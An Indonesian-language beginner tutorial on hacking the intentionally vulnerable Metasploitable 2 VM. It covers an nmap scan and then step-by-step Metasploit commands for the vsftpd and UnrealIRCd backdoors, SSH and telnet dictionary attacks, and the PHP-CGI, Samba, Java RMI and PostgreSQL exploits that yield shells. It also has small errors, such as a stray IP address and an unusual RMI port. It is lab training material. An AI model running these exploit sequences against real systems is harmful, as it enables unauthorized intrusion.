Metasploitable: pentest
sumber: https://www.hackingarticles.in/penetration-testing-skills-practice-metasploitable-beginner-guide/
Metasploitable adalah versi rentan Linux Ubuntu yang sengaja dirancang untuk menguji tool keamanan dan mendemonstrasikan kerentanan umum berbasis mesin virtual yang membantu kita melakukan pelatihan keamanan, menguji alat keamanan, dan mempraktekkan teknik pengujian penetrasi umum. VM akan berjalan pada produk VMware terbaru dan teknologi visualisasi lainnya seperti VirtualBox. Anda dapat men-download metasploitable dari
- https://www.vulnhub.com/entry/metasploitable-2,29/
- https://information.rapid7.com/download-metasploitable-2017.html
Metasploitable adalah framework yang dapat dieksploitasi yang membantu kita untuk meningkatkan keterampilan kita dan juga membantu penggunaan untuk menggunakan setiap port untuk keuntungan kita karena kita semua tahu bahwa port dan protokol adalah dasar dari peretasan sehingga, oleh karena itu, semakin banyak anda dapat mengambil manfaat dari korban.
Dalam hal ini kita akan menelusuri seluruh konsep metasploitable termasuk cara menginstalnya dan cara meretasnya selangkah demi selangkah. Kami akan mengambil semua port satu per satu yang rentan dan mencoba untuk mengeksploitasinya.
Download & Install
Pertama-tama Anda harus mengunduh metasploit dari tautan berikut,
- https://www.vulnhub.com/entry/metasploitable-2,29/
- https://information.rapid7.com/download-metasploitable-2017.html
Setelah pengunduhan selesai, buka VirtualBox dan klik open mesin virtual.
Setelah mengklik OK, metasploitable akan terbuka di mesin virtual dan menjalankannya cukup klik pada Power pada mesin virtual ini dan itu akan menjalankan metasploitable anda.
Saat start, akan ditanya username password, masukan
username msfadmin password msfadmin
Cek IP
Cek IP address menggunakan
ifconfig
Asumsi IP metasploitable
Asumsi IP metasploitable
192.168.122.134
nmap
Scan sederhana dapat menggunakan nmap
nmap -sS -v -O 192.168.122.134
Dari hasil scan nmap kita akan bisa melihat port mana yang terbuka service mana yang berjalan di port mana. Kita dapat memulai serangan satu per satu di port yang vulneable.
attack vsftpd
buka metasploit di kali linux, ketik
search vsftpd 2.3.4
Lanjutkan, ketik
use exploit/unix/ftp/vsftpd_234_backdoor set rhost 192.168.122.134 set rport 21 exploit
Jika berhasil maka anda akan masuk ke shell metasploitable. Jika selesai melakukan pekerjaan attack, ketik
exit
attack ssh
Buat file di Kali Linux
/root/Desktop/user.txt /root/Desktop/pass.txt
Isi user.txt
msfadmin user
Isi pass.txt
msfadmin
Masuk ke metasploit, ketik,
use auxiliary/scanner/ssh/ssh_login set rhosts 192.168.1.106 set rport 22 set user_file /root/Desktop/user.txt set pass_file /root/Desktop/pass.txt exploit
Anda akan dapat username & password yang bisa di akses menggunakan ssh
Remote login dari kali linux
misalnya IP metasploitable 192.168.122.134
ssh msfadmin@192.168.122.134
password
msfadmin
attack telnet
Jalankan metasploit di kali linux, ketik
use auxiliary/scanner/telnet/telnet_login set rhosts 192.168.122.134 set rport 23 set user_file /root/Desktop/user.txt set pass_file /root/Desktop/pass.txt exploit
Sama dengan ssh, ini adalah dictionary attack. Setelah memperoleh password kita dapat masuk dari kali linux menggunakan
telnet 192.168.122.134
attack web
Contoh serangan metasploit ke web di port 80. Jalankan metasploit di kali linux, ketik
use exploit/multi/http/php_cgi_arg_injection set rhost 192.168.122.134 set rport 80 exploit
Anda akan masuk ke sesi meterpreter dari metasploitable
attack file sharing
Serangan ke file sharing di port 139. Jalankan metasploit di kali linux, ketik
use exploit/multi/samba/usermap_script set rhost 192.168.122.134 set rport 139 exploit
Ini akan masuk ke shell metasploit lagi. Selanjutnya, ketik,
use exploit/multi/misc/java_rmi_server set rhost 192.168.122.134 set rport 1899 exploit
Ketik "ENTER" kita akan masuk ke sesi meterpreter
attack postgres
Masuk ke metasploit di kali linux, ketik
use exploit/linux/postgres/postgres_payload set rhost 192.168.122.134 set rport 5432 exploit
Jika berhasil, anda akan masuk ke sesi meterpreter
attack ircd
Masuk ke metasploit di kali linux, search Unreal ircd exploit
search Unreal ircd
Ketik,
use exploit/unix/irc/unreal_ircd_3281_backdoor set rhost 192.168.122.134 set rport 6667 exploit
Jika berhasil, tekan "ENTER", kita akan masuk ke shell metasploitable.